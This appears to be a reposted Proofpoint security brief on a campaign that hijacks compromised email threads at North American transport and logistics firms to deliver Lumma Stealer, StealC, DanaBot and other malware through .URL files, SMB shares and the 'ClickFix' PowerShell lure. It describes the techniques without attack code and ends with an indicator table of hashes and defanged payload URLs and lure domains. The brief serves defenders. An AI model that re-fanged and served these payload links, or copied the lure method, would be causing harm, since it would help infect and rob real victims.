Focus Mode
Threat Research

Security Brief: Cyber Actor Targets Transport and Logistics Firms with Malware via Compromised Accounts and Tailored Social Engineering

Proofpoint
  • Short Summary: Proofpoint researchers are monitoring a cluster of cyber activities targeting transportation and logistics companies in North America. The attacks involve compromised email accounts to deliver various malware payloads, including Lumma Stealer, StealC, and DanaBot, using social engineering tactics to make messages appear legitimate.
  • Key Points:
    • Targeting transportation and logistics companies in North America.
    • Use of compromised legitimate email accounts for malware delivery.
    • Malware payloads include Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2.
    • Initial access methods and malware delivery techniques have evolved since May 2024.
    • Campaigns often include messages with Google Drive URLs or .URL file attachments.
    • New technique “ClickFix” used to deliver malware via PowerShell scripts.
    • Threat actors impersonate legitimate software used in transport and fleet management.
    • Proofpoint has not attributed the activity to a specific threat actor.
    • Increased sophistication in social engineering tactics observed.
    • Users are advised to verify suspicious emails through alternative communication methods.
  • MITRE ATT&CK TTPs – created by AI
    • Initial Access (T1078)
      • Use of compromised email accounts to gain access to legitimate conversations.
    • Execution (T1059.001)
      • Execution of Base64 encoded PowerShell scripts via the “ClickFix” technique.
    • Persistence (T1136)
      • Malware installation through remote shares using SMB.
    • Command and Control (T1071)
      • Use of URLs leading to malicious payloads hosted on compromised servers.
    • Exfiltration (T1041)
      • Potential data theft via malware like Lumma Stealer and StealC.

What happened 

Proofpoint researchers are tracking a cluster of activity targeting transportation and logistics companies in North America to deliver a variety of different malware payloads.  

Notably, this activity leverages compromised legitimate email accounts that belong to transportation and shipping companies. At this time, it is unclear how the actor achieves access to the compromised accounts. The actor then injects malicious content into existing conversations within the account’s inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns. 

Researchers have been tracking this activity cluster since late May 2024. Activity which occurred from May to July 2024 predominately delivered Lumma Stealer, StealC, or NetSupport. In August 2024, the threat actor changed tactics by employing new infrastructure and a new delivery technique, as well as adding payloads to deliver DanaBot and Arechclient2. 

Most campaigns use messages with Google Drive URLs leading to an internet shortcut (.URL) file, or a .URL file attached directly to the message. If executed, it uses SMB to access an executable from the remote share, which installs the malware.   

Actor responds from a compromised account to a request within an ongoing thread. 

Actor using a compromised account to post a malicious link to an ongoing thread. 

Campaigns typically include less than 20 messages and impact a small number of customers, all in the same transport/logistics industries in North America.  

In August 2024, the actor also began using the “ClickFix” technique to deliver their malware. The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML, a technique called “ClickFix.” The scripts led to an MSI file used to load DanaBot.   

Initial “ClickFix” dialogue box in which clicking the “Fix it” button copies a Base64 encoded PowerShell script. 

Final “ClickFix” dialogue box with instructions to open Windows PowerShell and paste and run the PowerShell script. 

While Proofpoint has observed this technique leveraged by other threat actors impersonating Word or Chrome updates, these campaigns have impersonated Samsara, AMB Logistic, and Astra TMS – software that would only be used in transport and fleet operations management.   

Attribution  

Proofpoint does not currently attribute this activity cluster to an identified threat actor (TA). Similar techniques and infrastructure associated with ClickFix and the combination of Google Drive URLs, .URL files, and SMB have been observed used by other threat actors and campaigns. Proofpoint researchers assess that the threat actor discussed in this Security Brief is purchasing this infrastructure from third party providers.   

Based on the observed initial access activity, malware delivery, and infrastructure, Proofpoint assesses with moderate confidence the activity aligns with financially motivated, cybercriminal objectives. 

Why it matters  

Threat actors are increasingly tailoring lures to be more realistic to entice recipients to click on a link or download attachments. Compromising legitimate email accounts and sending malicious links and attachments to an existing email conversation achieves this goal and raises the risk that recipients will install malware.   

The specific targeting and compromises of organizations within transportation and logistics, as well as the use of lures that impersonate software specifically designed for freight operations and fleet management, indicates that the actor likely conducts research into the targeted company’s operations before sending campaigns. The language used in the lures and content also indicate familiarity with typical business workflows.  

This activity aligns with a trend Proofpoint researchers have observed across the cybercriminal threat landscape. Threat actors are developing more sophisticated social engineering and initial access techniques across the delivery attack chain while relying more on commodity malware rather than complex and unique malware payloads.  

Members of the transportation/logistics industry, and users in general, should exercise caution with emails coming from known senders which deviate from normal activity or content, particularly when combined with unusual looking links and file types such as described in this Security Brief. In other words, emails that do not look or feel right and trigger a sixth sense that something is off.   

When encountering such activity users should contact the sender using another means to confirm their authenticity. 

Indicators of compromise 

Indicator 

Description 

First Observed 

199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431 

SHA256 
.URL file 

2024-05-22 

ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e 

SHA256 
.URL file 

2024-07-01 

e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842 

SHA256 
.URL file 

2024-07-12 

e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37 

SHA256 
.URL file 

2024-07-24 

f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f 

 

SHA256 
.URL file 

2024-08-05 

0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2 

 

SHA256 
.URL file 

2024-08-24 

582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04 

 

SHA256 
.URL file 

2024-09-06 

hxxp://89[.]23[.]98[.]98/file/14242.exe 

URL 

Payload 

2024-05-22 

hxxp://89[.]23[.]98[.]98/file/ratecon.exe 

URL 

Payload 

2024-07-01 

hxxp://89[.]23[.]98[.]98/file/rate_confirmation.vbs 

URL 

Payload 

2024-07-12 

hxxp://89[.]23[.]98[.]98/file/Rateconfirm.exe 

URL 

Payload 

2024-07-24 

hxxp://89[.]23[.]98[.]98/file/carrier.exe 

URL 

Payload 

2024-08-05 

hxxp://185[.]217[.]197[.]84/file/remittance.exe 

URL 

Payload 

2024-08-24 

hxxp://185[.]217[.]197[.]84/file/information_package.exe 

URL 

Payload 

2024-09-06 

hxxps://live-samsaratrucking[.]com/true-tracking-32934.html 

URL 

ClickFix 

2024-08-19 

hxxp://ambcrrm[.]com/ 

 

URL 

ClickFix 

2024-09-03 

hxxps://ambccm[.]com/Astra/index.html 

URL 

ClickFix 

2024-09-10 

hxxps://idessit[.]com/fn.msi 

 

URL 

Danabot Payload 

2024-08-19 

hxxps://ambccm[.]com/3.msi 

URL 

Danabot Payload 

2024-09-05 

 

hxxps://ambcrrm[.]com/3.msi 

 

URL 

Danabot Payload 

2024-09-03 

957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d 

 

SHA256 

14242.exe 

Suspected Lumma 

2024-06-14 

2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319 

 

SHA256 

rate_confirmation.vbs 

Lumma  

2024-07-12 

 

8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618 

 

SHA256 

ratecon.exe 

StealC/NetSupport 

2024-07-24 

cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013 

 

SHA256 

Rateconfirm.exe 

StealC  

2024-07-25 

d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d 

SHA256 

carrier.exe 

Arechclient2 

2024-08-05 

fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7 

 

SHA256 

fn.msi 

Danabot 

2024-08-19 

163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a 

 

SHA256 

remittance.exe 

2024-08-24 

37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235 

 

SHA256 

3.msi 

Danabot 

2024-09-03 

1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3 

SHA256 

information_package.exe 

Lumma Stealer 

2024-09-06 

b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86 

SHA256 

information_package.exe 

StealC/NetSupport  

2024-09-10 

 

Analyst note: Proofpoint researchers identified overlap in infrastructure from this threat cluster with suspected UAC-0050 activity but does not assess the activity sets are related at this time.  

Source: Original Post

Tags: INITIAL ACCESS, PERSISTENCE, PAYLOAD, WINDOWS, SOCIAL ENGINEERING, IMPACT, EXFILTRATION, EMAIL